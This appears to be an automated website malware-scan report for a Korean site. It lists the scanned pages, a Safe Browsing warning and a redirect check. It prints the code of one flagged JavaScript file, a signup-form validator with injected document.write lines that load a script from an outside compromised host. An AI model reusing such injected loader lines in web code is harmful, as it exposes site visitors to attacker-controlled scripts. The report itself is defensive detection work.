Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hillnheel.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hillnheel.com/ | 200 OK Content-Length: 12038 Content-Type: text/html | clean |
http://hillnheel.com/Binclude/indexJs.js | 200 OK Content-Length: 10093 Content-Type: application/javascript | clean |
http://hillnheel.com/include/01.js | 200 OK Content-Length: 94 Content-Type: application/javascript | clean |
http://hillnheel.com/index.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 12038 Content-Type: text/html | clean |
http://hillnheel.com/07_login/01_login.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 37443 Content-Type: text/html | clean |
http://hillnheel.com/07_login/../include/01.js | 200 OK Content-Length: 94 Content-Type: application/javascript | clean |
http://hillnheel.com/07_login/../Bmember/Js/memberformJs.js | 200 OK Content-Length: 16276 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function JoinCheck(form) {
  if(!signform.ck_yak.checked) { alert("약관에 동의 하셔야 회원가입이 가능합니다."); signform.ck_yak.focus(); return false; }
  if(isBlank(signform.uid.value)) { alert("아이디를 입력하세요"); signform.uid.focus(); return false; }
  var chr = signform.uid.value.substr(0,1);
  if(chr >= 0 || chr > 9 ) { alert('첫 글자는 영문이어야 합니다. '); signform.uid
  dropDownListBoxInit(form.uemail2); }
function dropDownListBoxInit(obj) { try { obj.reInitializeSelectBox(); } catch (ignore) {} obj.fireEvent("onchange"); }
document.write('<script src=http://sebastiangora-photography.com/1ok/pluginmgr.php ><\/script>');
document.write('<script src=http://sebastiangora-photography.com/1ok/pluginmgr.php ><\/script>');
Antivirus reports:
http://hillnheel.com/07_login/02_login.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 12456 Content-Type: text/html | clean |
http://hillnheel.com/05_fam/01_fam.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 10128 Content-Type: text/html | clean |
http://hillnheel.com/05_fam/../include/01.js | 200 OK Content-Length: 94 Content-Type: application/javascript | clean |
http://hillnheel.com/05_fam/02_fam.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 14264 Content-Type: text/html | clean |
http://hillnheel.com/Bboard/Js/board_defaultJs.js | 200 OK Content-Length: 2711 Content-Type: application/javascript | clean |
http://hillnheel.com/05_fam/02_fam.php?bmain=view&page=1&total_page=0&num=1&search=&key=&mode=&PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 14985 Content-Type: text/html | clean |
http://hillnheel.com/05_fam/02_fam.php?bmain=list&num=&page=1&search=&key=&PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 14264 Content-Type: text/html | clean |
http://hillnheel.com/test404page.js | 404 Not Found Content-Length: 218 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hillnheel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Feb 2015 23:05:14 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b1a95741f383d1a648b59188b6fbd838; path=/
X-Powered-By: PHP/4.4.7p2
Second query (visit from search engine):
GET / HTTP/1.1
Host: hillnheel.com
Referer: http://www.google.com/search?q=hillnheel.com
Result:
The result is similar to that of the first query; no suspicious redirects were found.